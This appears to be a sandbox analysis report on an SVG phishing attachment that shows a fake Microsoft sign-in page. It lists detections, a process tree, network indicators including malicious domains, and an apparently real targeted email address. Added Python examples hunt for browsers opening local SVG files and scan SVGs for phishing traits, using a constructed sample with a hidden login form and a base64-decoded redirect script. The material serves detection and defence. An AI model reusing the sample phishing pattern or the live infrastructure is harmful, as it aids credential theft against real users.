Windows Analysis Report
ATT48234.svg

Overview

General Information

Sample name: ATT48234.svg
Analysis ID: 1635916
MD5: 2c7d48a01066ebf49b626c073fcdf54d
SHA1: 322754f01c7c9f993d7c334547fea1d78286b747
SHA256: 64df54eefba97410b2065e66c58b847b554222f69f71a825b8c5cc7fb147ab69

Detection

HTMLPhisher
Score: 64
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Performs DNS queries to domains with low reputation
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 8572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT48234.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 8920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 8408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5196 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5128 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
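The tree above is the entire execution chain: no dropper and no script host, only Chrome handed a local .svg from the user's desktop. That is enough, because a browser opening an SVG file as its top-level document renders it as a page and runs the script inside it. The following Python is an added example written for this page, not Joe Sandbox tooling: it reads rows in the tree's own format and flags a browser launched on a local .svg path. In its sample tree only the first row is taken from this report; the other three are constructed to show what the check must ignore (Chrome's --type= children, which are spawned by the launch rather than being it, and a remote SVG URL, which is ordinary browsing) and what it must catch.

```python
import re

# One row of the report's process tree, e.g.
#   chrome.exe (PID: 8572 cmdline: "C:\...\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT48234.svg" MD5: E81F...)
PROC_LINE_RE = re.compile(
    r'^[\s•*-]*(?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmdline>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)\s*$'
)
# A local drive path ending in .svg, either quoted (may contain spaces) or bare.
LOCAL_SVG_RE = re.compile(r'"([A-Za-z]:\\[^"]*?\.svg)"|([A-Za-z]:\\\S*?\.svg)\b', re.IGNORECASE)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe"}

# Constructed sample tree: the first row is this report's own launch line; the
# other three are made up to show what the check must ignore and what it must catch.
SAMPLE_PROCESS_TREE = [
    r'• chrome.exe (PID: 8572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT48234.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)',
    r'• chrome.exe (PID: 8920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService MD5: E81F54E6C1129887AEA47E7D092680BF)',
    r'• chrome.exe (PID: 1234 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://example.com/logo.svg MD5: E81F54E6C1129887AEA47E7D092680BF)',
    r'• msedge.exe (PID: 4321 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\Downloads\invoice.svg MD5: 00000000000000000000000000000000)',
]


def parse_process_line(line):
    """Split one tree row into image, pid, cmdline and md5; None if it is not a row."""
    m = PROC_LINE_RE.match(line)
    return m.groupdict() if m else None


def local_svg_argument(rec):
    """Path of a local .svg handed to a browser at launch, else None."""
    if rec["image"].lower() not in BROWSERS:
        return None
    if " --type=" in rec["cmdline"]:      # renderer/utility children, not the launch itself
        return None
    m = LOCAL_SVG_RE.search(rec["cmdline"])
    return (m.group(1) or m.group(2)) if m else None


def hunt(lines):
    """(pid, path) for every row where a browser was launched on a local SVG file."""
    hits = []
    for line in lines:
        rec = parse_process_line(line)
        if rec is None:
            continue
        path = local_svg_argument(rec)
        if path:
            hits.append((int(rec["pid"]), path))
    return hits


if __name__ == "__main__":
    for pid, path in hunt(SAMPLE_PROCESS_TREE):
        print(pid, path)
```

The same predicate (browser image, no --type= argument, a local path ending in .svg) transfers directly to process-creation telemetry from an EDR or Sysmon; the row parser is only there so the check can be run against a report like this one.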
No configs have been found
Yara Overview

Source           Rule                       Description                   Author
0.6.pages.csv    JoeSecurity_HtmlPhish_10   Yara detected HtmlPhish_10    Joe Security
0.7.pages.csv    JoeSecurity_HtmlPhish_10   Yara detected HtmlPhish_10    Joe Security
0.8.pages.csv    JoeSecurity_HtmlPhish_10   Yara detected HtmlPhish_10    Joe Security

No Sigma rule has matched

Suricata IDS Alerts

Timestamp                         SID       Severity   Classtype                 Source IP     Source Port   Destination IP   Destination Port   Protocol
2025-03-12T06:45:05.286427+0100   2803274   2          Potentially Bad Traffic   192.168.2.5   49709         172.67.74.152    443                TCP

        Phishing

Source: file:///C:/Users/user/Desktop/ATT48234.svg | Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.6.pages.csv
Source: Yara match | File source: 0.6.pages.csv, type: HTML
Source: Yara match | File source: 0.7.pages.csv, type: HTML
Source: Yara match | File source: 0.8.pages.csv, type: HTML
Source: Chrome DOM: 0.4 | OCR Text: Microsoft Browser ensuring safe internet use. Verifying... CLOUDFLARE Ten-rs To proceed, Microsoft has to ensure that your connection is safe and secure
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: Base64 decoded: norm.fitzgerald@nationalmi.com
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: Title: Sign in to your account does not match URL
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: Invalid link: Privacy statement
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/ATT48234.svg | HTTP Parser: No <meta name="copyright".. found
Source: unknown | HTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49729 version: TLS 1.2
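The HTTP Parser rows above (a password input with no form action, a base64-encoded e-mail address inside the file, a "Sign in to your account" title, script hidden in something delivered as an SVG image) are checks that can be run on the attachment before detonation. The following Python is an added example written for this page; it is neither Joe Sandbox's parser nor the content of ATT48234.svg, which the report does not reproduce. It parses an SVG, counts script blocks, inline event handlers, foreignObject HTML islands, password inputs and forms that have an action, and decodes every base64 run long enough to hide an address. Both SVG documents in it are constructed stand-ins, and the target address victim@example.com is made up.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for an SVG phishing attachment (NOT the report's
# ATT48234.svg, whose content the report does not include). It carries an HTML
# login form inside <foreignObject> and a base64-encoded target address in a
# <script> block; the address victim@example.com is made up.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xhtml="http://www.w3.org/1999/xhtml" width="400" height="300">
  <title>Sign in to your account</title>
  <foreignObject width="400" height="300">
    <xhtml:div>
      <xhtml:input type="email" name="u"/>
      <xhtml:input type="password" name="p"/>
    </xhtml:div>
  </foreignObject>
  <script>
    var e = atob("dmljdGltQGV4YW1wbGUuY29t");
    window.location = "https://example.invalid/?" + e;
  </script>
</svg>"""

# Constructed benign drawing, to show the checks stay quiet on a real image.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def _local_name(tag):
    # "{http://www.w3.org/2000/svg}foreignObject" -> "foreignobject"
    return tag.rsplit("}", 1)[-1].lower()


def scan_svg(svg_text):
    """Collect the structural facts behind the report's HTTP Parser rows."""
    root = ET.fromstring(svg_text)
    f = {"title": None, "script_blocks": 0, "event_handlers": 0,
         "foreign_objects": 0, "password_inputs": 0,
         "forms_with_action": 0, "decoded_emails": []}
    for el in root.iter():
        if not isinstance(el.tag, str):  # comments / processing instructions
            continue
        name = _local_name(el.tag)
        if name == "title" and f["title"] is None:
            f["title"] = (el.text or "").strip()
        elif name == "script":
            f["script_blocks"] += 1
        elif name == "foreignobject":
            f["foreign_objects"] += 1
        elif name == "input" and (el.get("type") or "").lower() == "password":
            f["password_inputs"] += 1
        elif name == "form" and el.get("action"):
            f["forms_with_action"] += 1
        # onload=, onclick=, ... run script without any <script> element
        f["event_handlers"] += sum(1 for a in el.attrib if a.lower().startswith("on"))
    # Decode every long base64 run in the raw text and keep any e-mail address found.
    for blob in B64_RE.findall(svg_text):
        try:
            text = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        f["decoded_emails"].extend(EMAIL_RE.findall(text))
    return f


def phishing_indicators(f):
    """Turn the facts into the reasons a triage note would list; [] means clean."""
    reasons = []
    if f["script_blocks"] or f["event_handlers"]:
        reasons.append("SVG executes script")
    if f["foreign_objects"]:
        reasons.append("SVG embeds HTML via foreignObject")
    if f["password_inputs"] and not f["forms_with_action"]:
        reasons.append("password input but no form action")
    if f["decoded_emails"]:
        reasons.append("base64-encoded e-mail address: " + ", ".join(f["decoded_emails"]))
    if f["title"] and "sign in" in f["title"].lower():
        reasons.append("login-themed title: " + f["title"])
    return reasons


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_SVG), ("benign", BENIGN_SVG)):
        print(label, phishing_indicators(scan_svg(doc)))
```

A password field with no form action means the credentials leave through script, not a form submit, so the exfiltration endpoint has to be found in the JavaScript or in the network trace rather than in the markup. The decoded address is worth extracting first: kits of this kind use it to pre-fill the username field, and it identifies the targeted mailbox without detonating anything.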

        Networking

Source: C:\Program Files\Google\Chrome\Application\chrome.exe | DNS query: 6032451419.xyz
Source: global traffic | TCP traffic: 192.168.2.5:59656 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 104.18.10.207
Source: Joe Sandbox View | IP Address: 151.101.129.229
Source: Joe Sandbox View | IP Address: 151.101.193.229
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 172.67.74.152:443
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 150.171.27.254
Source: unknown | TCP traffic detected without corresponding DNS query: 2.21.65.154
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.35
Source: unknown | TCP traffic detected without corresponding DNS query: 2.16.164.41
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 184.30.131.245
Source: unknown | TCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: AutoIt
    Host: api.ipify.org
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: AutoIt
    Host: api.ipify.org
Source: global traffic | HTTP traffic detected:
    GET /api/json/ip/5SPfwvEV3gwc55pvxBQOnjhEt01fgi0C/100.4.70.108 HTTP/1.1
    User-Agent: AutoIt
    Host: ipqualityscore.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1
    Host: cdn.jsdelivr.net
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Sec-Fetch-Storage-Access: active
    Referer: https://inv18993383.cloudfaxservice.de/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /turnstile/v0/api.js HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://inv18993383.cloudfaxservice.de/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1
    Host: cdn.jsdelivr.net
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://inv18993383.cloudfaxservice.de/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/ HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: iframe
    Sec-Fetch-Storage-Access: active
    Referer: https://inv18993383.cloudfaxservice.de/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91f0fc773d2dc950&lang=auto HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Sec-Fetch-Storage-Access: active
    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1655362686:1741756484:q3ExwLGQNkp_y8KzhtdyEVNWZSc09lr0GJahn82ftTU/91f0fc773d2dc950/o4Y_tZxHXOeYICtX5FS0XNXP5yLgUJtnRxyJmDC7UIo-1741758334-1.1.1.1-2T94pV33wd8wWpFTCfl1whaxqLP7nPGiZIxAibBHnRdf4ZOHNOMcy3VRIuDlY_9Y HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/challenge-platform/h/g/d/91f0fc773d2dc950/1741758340321/f-N77EFOvqIiJpj HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Sec-Fetch-Storage-Access: active
    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/challenge-platform/h/g/d/91f0fc773d2dc950/1741758340321/f-N77EFOvqIiJpj HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /cdn-cgi/challenge-platform/h/g/pat/91f0fc773d2dc950/1741758340321/46286f9ba986a1ed8f31d764eb9c21ac5cef8509fdbb1ba386a8e6efd09b08ba/hAuKx2TlQ_6wWb6 HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    Cache-Control: max-age=0
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /jquery-3.2.1.slim.min.js HTTP/1.1
    Host: code.jquery.com
    Connection: keep-alive
    Origin: https://inv18993383.cloudfaxservice.de
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://inv18993383.cloudfaxservice.de/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
    Host: cdnjs.cloudflare.com
    Connection: keep-alive
    Origin: https://inv18993383.cloudfaxservice.de
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://inv18993383.cloudfaxservice.de/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /bootstrap.min.js HTTP/1.1
    Host: 6032451419-1317754460.cos.ap-singapore.myqcloud.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://inv18993383.cloudfaxservice.de/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /google.php HTTP/1.1
    Host: 6032451419.xyz
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic | DNS traffic detected: DNS query: inv18993383.cloudfaxservice.de
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com
Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic | DNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global traffic | DNS traffic detected: DNS query: 6032451419-1317754460.cos.ap-singapore.myqcloud.com
Source: global traffic | DNS traffic detected: DNS query: 6032451419.xyz
Source: global traffic | DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic | DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic | DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic | DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic | DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic | DNS traffic detected: DNS query: beacons4.gvt2.com
Source: unknown | HTTP traffic detected:
    POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1655362686:1741756484:q3ExwLGQNkp_y8KzhtdyEVNWZSc09lr0GJahn82ftTU/91f0fc773d2dc950/o4Y_tZxHXOeYICtX5FS0XNXP5yLgUJtnRxyJmDC7UIo-1741758334-1.1.1.1-2T94pV33wd8wWpFTCfl1whaxqLP7nPGiZIxAibBHnRdf4ZOHNOMcy3VRIuDlY_9Y HTTP/1.1
    Host: challenges.cloudflare.com
    Connection: keep-alive
    Content-Length: 3463
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    Content-Type: text/plain;charset=UTF-8
    cf-chl: o4Y_tZxHXOeYICtX5FS0XNXP5yLgUJtnRxyJmDC7UIo-1741758334-1.1.1.1-2T94pV33wd8wWpFTCfl1whaxqLP7nPGiZIxAibBHnRdf4ZOHNOMcy3VRIuDlY_9Y
    cf-chl-ra: 0
    sec-ch-ua-mobile: ?0
    Accept: */*
    Origin: https://challenges.cloudflare.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: chromecache_132.1.dr | String found in binary or memory: http://opensource.org/licenses/MIT).
Source: unknown | Network traffic detected: HTTP traffic on port pairs (in the order observed):
    443 -> 49744, 443 -> 49743, 49672 -> 443, 443 -> 49740, 49789 -> 443, 49766 -> 443, 49743 -> 443, 443 -> 59667,
    49746 -> 443, 49781 -> 443, 49686 -> 443, 59663 -> 443, 443 -> 49736, 443 -> 49735, 49675 -> 443, 443 -> 49732,
    443 -> 49731, 49732 -> 443, 49784 -> 443, 59666 -> 443, 443 -> 49729, 49798 -> 443, 443 -> 49727, 443 -> 49725,
